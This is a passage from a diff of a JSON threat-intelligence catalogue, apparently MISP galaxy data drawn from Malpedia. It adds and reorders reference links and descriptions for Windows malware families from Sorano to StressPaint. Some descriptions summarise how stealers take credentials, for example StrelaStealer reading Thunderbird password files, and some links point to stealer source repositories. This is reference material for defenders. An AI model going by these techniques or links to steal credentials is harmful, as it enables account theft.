"https://malpedia.caad.fkie.fraunhofer.de/details/win.sorano", + "https://3xp0rt.xyz/lpmkikVic", "https://github.com/Alexuiop1337/SoranoStealer", - "https://github.com/3xp0rt/SoranoStealer", - "https://3xp0rt.xyz/lpmkikVic" + "https://github.com/3xp0rt/SoranoStealer" ], "synonyms": [], "type": [] @@ -45026,8 +47113,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sorgu", - "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east", - "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east" ], "synonyms": [], "type": [] @@ -45056,15 +47143,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite", - "https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf", - "https://attack.mitre.org/wiki/Software/S0157", - "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", - "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/", "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/", "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx", + "https://attack.mitre.org/wiki/Software/S0157", + "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A", - "https://www.secureworks.com/research/threat-profiles/tin-woodlawn" + "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf" ], "synonyms": [ "denis" @@ -45079,8 +47166,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spaceship", - "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf" ], "synonyms": [], "type": [] @@ -45093,11 +47180,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spark", - "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", - "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign", "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", - "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/", - "https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-one" + "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign", + "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", + "https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-one", + "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/" ], "synonyms": [], "type": [] @@ -45136,10 +47223,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spark_rat", - "https://www.sentinelone.com/labs/dragonspark-attacks-evade-detection-with-sparkrat-and-golang-source-code-interpretation/", - "https://blog.exatrack.com/melofee/", "https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/", - "https://github.com/XZB-1248/Spark" + "https://asec.ahnlab.com/en/52899/", + "https://blog.exatrack.com/melofee/", + "https://www.sentinelone.com/labs/dragonspark-attacks-evade-detection-with-sparkrat-and-golang-source-code-interpretation/", + "https://github.com/XZB-1248/Spark", + "https://asec.ahnlab.com/ko/56715/" ], "synonyms": [], "type": [] @@ -45152,8 +47241,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sparrow_door", - "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf", - "https://www.welivesecurity.com/2021/09/23/famoussparrow-suspicious-hotel-guest/" + "https://www.welivesecurity.com/2021/09/23/famoussparrow-suspicious-hotel-guest/", + "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf" ], "synonyms": [ "FamousSparrow" @@ -45176,6 +47265,19 @@ "uuid": "e4dce19f-bb8e-4ea1-b771-58b162946f29", "value": "Spartacus" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spectralviper", + "https://www.elastic.co/fr/security-labs/elastic-charms-spectralviper" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4f9ee4dc-725e-4a8e-8c10-a013f6949b2d", + "value": "SPECTRALVIPER" + }, { "description": "Mixed RAT and Botnet malware sold in underground forums. In march 2021 it was advertised with the Spectre 2.0, it reached version 3 in June 2021 and then quickly version 4. This crimeware tool was being abused in malicious campaigns targeting European users in September 2021.", "meta": { @@ -45233,9 +47335,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spider_rat", - "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_8_hara_en.pdf", + "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf", "https://twitter.com/nahamike01/status/1471496800582664193?s=20", - "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf" + "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_8_hara_en.pdf" ], "synonyms": [], "type": [] @@ -45248,12 +47350,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom", - "https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/", - "https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware", "https://github.com/MinervaLabsResearch/SporaVaccination", - "http://malware-traffic-analysis.net/2017/01/17/index2.html", + "https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware", + "https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/", + "https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas", "https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/", - "https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas" + "http://malware-traffic-analysis.net/2017/01/17/index2.html" ], "synonyms": [], "type": [] @@ -45278,14 +47380,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyder", - "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021", - "https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/", - "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques", "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/", + "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf", "https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive", - "https://vms.drweb.com/virus/?i=23648386", + "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques", + "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021", "https://st.drweb.com/static/new-www/news/2021/march/BackDoor.Spyder.1_en.pdf", - "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf" + "https://vms.drweb.com/virus/?i=23648386", + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf", + "https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/" ], "synonyms": [], "type": [] @@ -45298,18 +47401,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyeye", - "https://www.computerworld.com/article/2509482/spyeye-trojan-defeating-online-banking-defenses.html", - "https://krebsonsecurity.com/2010/09/spyeye-botnets-bogus-billing-feature/", "http://malwareint.blogspot.com/2010/02/spyeye-bot-part-two-conversations-with.html", - "https://www.pcworld.com/article/247252/spyeye_malware_borrows_zeus_trick_to_mask_fraud.html", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FSpyeye", - "https://www.sans.org/reading-room/whitepapers/malicious/clash-titans-zeus-spyeye-33393", - "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals", "https://securelist.com/financial-cyberthreats-in-2020/101638/", - "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", - "https://krebsonsecurity.com/2010/04/spyeye-vs-zeus-rivalry/", "https://krebsonsecurity.com/2011/04/spyeye-targets-opera-google-chrome-users/", - "https://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot" + "https://www.pcworld.com/article/247252/spyeye_malware_borrows_zeus_trick_to_mask_fraud.html", + "https://krebsonsecurity.com/2010/09/spyeye-botnets-bogus-billing-feature/", + "https://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot", + "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals", + "https://krebsonsecurity.com/2010/04/spyeye-vs-zeus-rivalry/", + "https://www.computerworld.com/article/2509482/spyeye-trojan-defeating-online-banking-defenses.html", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", + "https://www.sans.org/reading-room/whitepapers/malicious/clash-titans-zeus-spyeye-33393" ], "synonyms": [], "type": [] @@ -45318,34 +47421,34 @@ "value": "SpyEye" }, { - "description": "According to Sophos, Squirrelwaffle is a malware loader that is distributed as a malicious Office document in spam campaigns. It provides attackers with an initial foothold in a victim’s environment and a channel to deliver and infect systems with other malware. When a recipient opens a Squirrelwaffle-infected document and enables macros, a visual basic script typically downloads and executes malicious files and scripts, giving further control of the computer to an attacker. Squirrelwaffle operators also use DocuSign to try and trick the user into enabling macros in Office documents.", + "description": "According to Sophos, Squirrelwaffle is a malware loader that is distributed as a malicious Office document in spam campaigns. It provides attackers with an initial foothold in a victim\u2019s environment and a channel to deliver and infect systems with other malware. When a recipient opens a Squirrelwaffle-infected document and enables macros, a visual basic script typically downloads and executes malicious files and scripts, giving further control of the computer to an attacker. Squirrelwaffle operators also use DocuSign to try and trick the user into enabling macros in Office documents.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirrelwaffle", - "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/", - "https://blogs.blackberry.com/en/2021/11/threat-thursday-squirrelwaffle-loader", - "https://redcanary.com/blog/intelligence-insights-november-2021/", - "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html", "https://twitter.com/Max_Mal_/status/1442496131410190339", - "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike", - "https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf", - "https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9", - "https://certitude.consulting/blog/en/unpatched-exchange-servers-distribute-phishing-links-squirrelwaffle/", - "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/", - "https://www.cynet.com/understanding-squirrelwaffle/", - "https://redcanary.com/blog/intelligence-insights-december-2021", "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", - "https://www.malware-traffic-analysis.net/2021/09/17/index.html", + "https://www.cynet.com/understanding-squirrelwaffle/", + "https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf", + "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html", + "https://redcanary.com/blog/intelligence-insights-december-2021", + "https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-newest-malicious-actor-squirrelwaffle-malicious-doc/", "https://blog.minerva-labs.com/a-new-datoploader-delivers-qakbot-trojan", + "https://news.sophos.com/en-us/2022/02/15/vulnerable-exchange-server-hit-by-squirrelwaffle-and-financial-fraud/", "https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike", - "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot", - "https://www.youtube.com/watch?v=9X2P7aFKSw0", - "https://security-soup.net/squirrelwaffle-maldoc-analysis/", - "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html", - "https://twitter.com/jhencinski/status/1464268732096815105", + "https://blogs.blackberry.com/en/2021/11/threat-thursday-squirrelwaffle-loader", + "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/", "https://www.sentinelone.com/blog/is-squirrelwaffle-the-new-emotet-how-to-detect-the-latest-malspam-loader/", - "https://news.sophos.com/en-us/2022/02/15/vulnerable-exchange-server-hit-by-squirrelwaffle-and-financial-fraud/" + "https://security-soup.net/squirrelwaffle-maldoc-analysis/", + "https://certitude.consulting/blog/en/unpatched-exchange-servers-distribute-phishing-links-squirrelwaffle/", + "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike", + "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html", + "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot", + "https://twitter.com/jhencinski/status/1464268732096815105", + "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/", + "https://www.malware-traffic-analysis.net/2021/09/17/index.html", + "https://redcanary.com/blog/intelligence-insights-november-2021/", + "https://www.youtube.com/watch?v=9X2P7aFKSw0" ], "synonyms": [ "DatopLoader" @@ -45356,7 +47459,7 @@ "value": "Squirrelwaffle" }, { - "description": "", + "description": "According to PaloAlto, SquirtDanger is a commodity botnet malware family that comes equipped with a number of characteristics and capabilities. The malware is written in C# (C Sharp) and has multiple layers of embedded code. Once run on the system, it will persist via a scheduled task that is set to run every minute. SquirtDanger uses raw TCP connections to a remote command and control (C2) server for network communications.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirtdanger", @@ -45374,8 +47477,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sshnet", "https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices", - "https://www.crowdstrike.com/blog/who-is-pioneer-kitten/", - "https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign.pdf" + "https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign.pdf", + "https://www.crowdstrike.com/blog/who-is-pioneer-kitten/" ], "synonyms": [], "type": [] @@ -45388,9 +47491,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm", - "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/" + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf" ], "synonyms": [], "type": [] @@ -45499,10 +47602,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stashlog", - "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html", - "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques", + "https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive", "https://twitter.com/ESETresearch/status/1433819369784610828", - "https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive" + "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques", + "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html" ], "synonyms": [], "type": [] @@ -45515,11 +47618,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealbit", - "https://twitter.com/r3c0nst/status/1425875923606310913", - "https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/", "https://www.accenture.com/us-en/blogs/security/stealbit-exmatter-exfiltration-tool-analysis", + "https://www.cybereason.com/blog/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool", "https://securelist.com/new-ransomware-trends-in-2022/106457/", - "https://www.cybereason.com/blog/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool" + "https://twitter.com/r3c0nst/status/1425875923606310913", + "https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/" ], "synonyms": [ "Corrempa" @@ -45534,8 +47637,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc", + "https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/", + "https://www.esentire.com/blog/stealc-delivered-via-deceptive-google-sheets", "https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/", - "https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/" + "https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/Stealc/stealc_config_extractor.ipynb", + "https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/Stealc/stealc_string_decryption.py" ], "synonyms": [], "type": [] @@ -45544,12 +47650,12 @@ "value": "Stealc" }, { - "description": "According to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as the running processes, Desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP address. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes, and malware analysis tools and checking if the process is being debugged. The malware also embedded a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actor’s addresses if the victim makes a transaction. The stolen information is sent to a Discord channel using a Discord Webhook.", + "description": "According to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as the running processes, Desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP address. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes, and malware analysis tools and checking if the process is being debugged. The malware also embedded a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actor\u2019s addresses if the victim makes a transaction. The stolen information is sent to a Discord channel using a Discord Webhook.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealerium", - "https://github.com/Stealerium/Stealerium", - "https://resources.securityscorecard.com/research/stealerium-detailed-analysis" + "https://resources.securityscorecard.com/research/stealerium-detailed-analysis", + "https://github.com/Stealerium/Stealerium" ], "synonyms": [], "type": [] @@ -45562,8 +47668,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealer_0x3401", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks" + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks/" ], "synonyms": [], "type": [] @@ -45572,7 +47678,7 @@ "value": "Stealer0x3401" }, { - "description": "According to Fortinet, StealthWorker is a brute-force malware that has been linked to a compromised e-commerce website with an embedded skimmer that steals personal information and payment details. Before hackers can embed a skimmer, however, the first requirement is for hackers to gain access to their target’s backend. Hacker’s commonly take advantage of vulnerabilities in the Content Management System (CMS) or its plugins to gain entry into the target’s system. Another, simpler option is to use brute force attacks. Though quite slow, this method is still effective against administrators using weak or commonly used passwords.", + "description": "According to Fortinet, StealthWorker is a brute-force malware that has been linked to a compromised e-commerce website with an embedded skimmer that steals personal information and payment details. Before hackers can embed a skimmer, however, the first requirement is for hackers to gain access to their target\u2019s backend. Hacker\u2019s commonly take advantage of vulnerabilities in the Content Management System (CMS) or its plugins to gain entry into the target\u2019s system. Another, simpler option is to use brute force attacks. Though quite slow, this method is still effective against administrators using weak or commonly used passwords.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealthworker", @@ -45585,11 +47691,25 @@ "uuid": "d1c5a299-c072-44b5-be31-d03853bca5ea", "value": "StealthWorker Go" }, + { + "description": "Check Point Research observed a wave of highly-targeted espionage attacks in Libya that utilize a new custom modular backdoor. Stealth Soldier malware is an undocumented backdoor that primarily operates surveillance functions such as file exfiltration, screen and microphone recording, keystroke logging and stealing browser information.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealth_soldier", + "https://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "07a24653-0f0b-49cf-944d-b4686b7e48d0", + "value": "Stealth Soldier" + }, { "description": "Malware written in .NET that hides in Steam profile pictures. Tries to evade virtualization through detection if it is executed within VMWare or VirtualBox.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.steamhide", + "https://www.gdatasoftware.com/blog/2021/06/36861-malware-hides-in-steam-profile-images", "https://www.gdatasoftware.com/blog/steamhide-malware-in-profile-images" ], "synonyms": [], @@ -45629,12 +47749,12 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stonedrill", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", - "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf" + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail" ], "synonyms": [], "type": [] @@ -45647,25 +47767,26 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stop", - "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", + "https://malienist.medium.com/defendagainst-ransomware-stop-c8cf4116645b", + "https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/", + "https://github.com/vithakur/detections/blob/main/STOP-ransomware-djvu/IOC-list", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://drive.google.com/file/d/1L8mkylrCJyd-817-45RA6gIFCCX4oaOv/view", + "https://www.bleepingcomputer.com/news/security/djvu-ransomware-spreading-new-tro-variant-through-cracks-and-adware-bundles/", + "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", + "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/", + "https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/", + "https://www.gdata.de/blog/1970/01/-35391-finger-weg-von-illegalen-software-downloads", "https://securelist.com/keypass-ransomware/87412/", "https://intel471.com/blog/privateloader-malware", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", - "https://www.bleepingcomputer.com/news/security/djvu-ransomware-spreading-new-tro-variant-through-cracks-and-adware-bundles/", - "https://malienist.medium.com/defendagainst-ransomware-stop-c8cf4116645b", - "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore", - "https://angle.ankura.com/post/102het9/the-stop-ransomware-variant", "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", - "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", - "https://www.gdata.de/blog/1970/01/-35391-finger-weg-von-illegalen-software-downloads", - "https://github.com/vithakur/detections/blob/main/STOP-ransomware-djvu/IOC-list", - "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/", "https://www.gdatasoftware.com/blog/2022/01/malware-vaccines", - "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", - "https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/", - "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/", - "https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/" + "https://angle.ankura.com/post/102het9/the-stop-ransomware-variant", + "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", + "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/" ], "synonyms": [ "Djvu", @@ -45694,9 +47815,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stowaway", - "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government", "https://blog.exatrack.com/melofee/", - "https://github.com/ph4ntonn/Stowaway" + "https://github.com/ph4ntonn/Stowaway", + "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government" ], "synonyms": [], "type": [] @@ -45716,12 +47837,27 @@ "uuid": "0439c5ec-306e-4473-84f7-50bdb5539fc2", "value": "Stration" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stratofear", + "https://www.mandiant.com/resources/blog/north-korea-supply-chain" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a968a42e-4162-46db-a96e-2a45927d1cd7", + "value": "STRATOFEAR" + }, { "description": "According to PCRisk, StrelaStealer seeks to extract email account log-in credentials. At the time of writing, this program targets Microsoft Outlook and Mozilla Thunderbird email clients.\r\n\r\nFollowing successful infiltration, StrelaStealer searches for \"logins.json\" (account/password) and \"key4.db\" (password database) within the \"%APPDATA%\\Thunderbird\\Profiles\\\" directory - by doing so, it can acquire the credentials for Thunderbird.\r\n\r\nAlternatively, if Outlook credentials are targeted - StrelaStealer seeks out the Windows Registry from where it can retrieve the program's key and \"IMAP User\", \"IMAP Server\", as well as the \"IMAP Password\" values. Since the latter is kept in an encrypted form, the malicious program employs the Windows CryptUnprotectData feature to decrypt it prior to exfiltration.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.strelastealer", - "https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc" + "https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc", + "https://research.openanalysis.net/strelastealer/stealer/2023/05/07/streala.html", + "https://cert-agid.gov.it/news/analisi-tecnica-e-considerazioni-sul-malware-strela/" ], "synonyms": [], "type": [] @@ -45734,9 +47870,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint", - "https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/", "https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/", "https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/", + 